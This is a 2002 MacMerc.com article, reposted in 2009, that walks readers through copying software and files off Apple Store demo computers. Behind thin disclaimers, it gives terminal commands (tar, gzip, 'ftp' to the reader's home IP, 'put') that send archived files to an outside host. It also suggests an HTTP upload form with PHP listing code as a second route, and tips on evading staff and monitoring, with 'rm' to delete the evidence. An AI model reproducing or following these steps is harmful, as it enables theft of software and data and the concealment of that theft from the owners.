Apr 27 2009
Apple Store security negated!
By xmachackerx@hotmail.com
3/5/02 © MacMerc.com
Here’s the
warning: MacMerc.com and
all of its writers and publishers DO NOT condone STEALING from Apple Computer,
this article is just for the curious minds in our audience. We suggest that
you NOT try anything discussed here.
It came to my mind after visiting the local Apple Store that a devious person
could easily suck software (or any sort of file) off of the rows and rows of
fabulous computers, each decked out with super high-speed internet access. At
least at my local store the upstream is at least 50K/s which is pretty zippy.
The downstream is blistering but we don’t need to download anything to pull
off this hack. Internet access on ALL of the computers seems really cool, you
can check your email or send an iCard off from the mall. Ohhhh…. Ahhhh….
But to me I saw one thing and one thing only, FREE SOFTWARE.
MacOS X is pretty
much the only MacOS that could pull this off so easily. If you have a classic
machine that you want stuff off, read Method 2. Included in
X is: an FTP server, an HTTP server, compression utilities and an FTP client.
These are all of the tools to pull off both of the following methods. Yes, I
have tried these at the Apple Store. They could work anywhere with Mac’s and
broadband but the Apple Store is the most high profile location with both (and
lots of goodies to take).
As of press time
the methods detailed in this article do work. They may become
obsolete once Apple reads this (I’m assuming they will fix this quickly, maybe
a mater of hours). So if you are reading this on the day of publication run
out to the store and try it out, just don’t tell them who sent you 
. There
is a story circulating that the Apple Store will have Photoshop 7 on their computers….
That might be a nice thing to snatch but again we do not condone stealing. Please
do not try this if you aren’t prepared to face the consequences.
METHOD 1:
Step 1:
• On your home computer (I am assuming you are running X or another variant
of *nix) go to (/Applications/Utilities/Network Utility.app) and write down
your IP address. For this method you must have an always on connection. If you
don’t have it go check out Method 2. Some of you may have a
router to share access across a LAN. If so, go ahead and set Port Forwarding
(or something similar sounding) to forward port 21 to your node. This should
be in your router’s manual, it’s not a hard thing to do. If you do have a router
write down the IP of the ROUTER not of your node (this is a local-only IP thus
won’t be accessible at the store). To find that just lot into your router (most
home routers allow a web browser to log-in and change settings). With the combination
of forwarding and the IP of your router you can access your computer from any
internet access point.
Step 2:
•If you don’t already have FTP access turned on, go ahead and do it.
- Go to the System
Preferences and select sharing.
-
Select
the check box that says allow FTP access.
Step 3:
• Go to the Apple Store and find a computer that has no one around it.
You may want to play around a little first and have a sales person ask you if
you need help. Just say you are just looking and thank him. After that they
will leave you alone, as long as you seem rather savvy. I used a TiBook but
all of their computer have Internet Access.
Step 4:
• Find the
item that you want. It doesn’t have to be software it can be any sort of file
that you have permissions for. I first tried this with pictures (they are nice
and small). If what you want is a single file and kind of small skip the following
step, otherwise continue. It can be hard to choose.
Step 5:
• Go to Aladdin drop stuff (in the /Applications/Utilities/ dir) and stuff
your file. If it is not there (it may have been deleted) open up the Terminal
(/Applications/Utilities/Terminal.app on a default install) and type:
tar -cf /YOURFILENAME.tar
/path/to/file/free/warez
Where YOURFILENAME is what you want the file to be called and /path/to/file/free/warez
is the path to your file (you can drag it to the terminal and it fills this
in for you).
Now to save a little space we are going to gzip that file.
gzip
/YOURFILENAME.tar
Step 6:
• Now we are going to FTP… back at the terminal type the following:
ftp
your.ip.address
*Note
– I took this screen shot at home as to not get busted. The IP is my local
IP so don’t try anything.
- Obviosly replace
your.ip.address with that number you wrote down. - After a second
or two depending on the traffic between your two computers a prompt for a
username will appear. Type in your log-in for X. It will ask for a password,
which you must provide. - It is a very
good idea to make a dummy user on your system before you go to the store.
Who knows what monitoring stuff they are running? Better safe than sorry!
Step 7:
• We are now logged in to your computer from the Apple Store. Now just
type:
put /YOURFILENAME.tar.gz
- All you do now
is hit enter and wait. - The best thing
to do in this situation is to hide the window (option-click on the desktop)
and get interested in iMovie or something. Depending on file size you can
play around for a few seconds or minutes. - After it says
you are done you have the file residing on your computer…
Step 8:
• Good kids always trash the evidence…
rm /YOURFILENAME.tar.gz
Exit out of all the applications you may have opened, step back and be proud
you have compromised Apple Computer
(not that anyone would want to, or anyone would follow these directions).
Â
METHOD
2:
This is the method that I tried originally… Basically because I had all of
the code written for a website of mine before the Apple Store was even around.
It is harder to pull off unless you like to tweak code (if you do it is FUN!).
The major advantage is that it will work with a slow connection as long as you
have access to a web host with a fast one. It can be shared among friends without
having to dish out passwords to your computer which is also a major plus.
The basic concept is that you set up a website with an HTTP upload form and
it just sends the file to your server. I will give some links to some CGI’s
with potential but no directions for setting it up on X, if you need directions
the CGI’s come with them. If you are more of a novice on X, just use method
1 or find a friend.
- http://www.ftls.org/en/examples/cgi/eUpload.shtml
- http://www.hotscripts.com/Perl/Scripts_and_Programs/File_Manipulation/Upload_Systems/
I wrote some PHP code that
lists all files that you uploaded to a certain directory. PHP can be installed
on X, directions can be found here.
The can be used in tandem with an upload CGI to make a nice file transfer site
that you can pass around to friends. I even built in a delete function on mine
so that you can delete files from the web. Pretty sweet! I used this code in
my first attack. The code follows below sans the deleting option:
function do_files
($dir) {
//written by xmachackerx@hotmail.com use at will
$handle=@opendir(“/path/to/$dir”);
while (false
!== ($file = readdir($handle))) {
if ($file == “.DS_Store”) {
echo ” “;} elseif
($file == “..”) {
echo ” “;} elseif ($file == “.”) {
echo ” “;} elseif ($file == “index.html”) {
echo ” “;} else {
echo “ $file
“;
} }
closedir($handle);
} //close
function
?>
If you really need
the delete feature just email me.
I didn’t include it because unless you are adding session management to the
page it is really pointless, anyone can delete files (like the Apple Store employee
that walks to the computer and hits [delete] and your upload goes bye bye).
Have fun and remember to NOT STEAL SOFTWARE… IT IS ILLEGAL.
Please email any suggestions directly to me, I’ll try my best to get back to all of you. Thanks!
-Anonymous Coward
*Editors note: We’ve set up a discussion thread for you in the forums.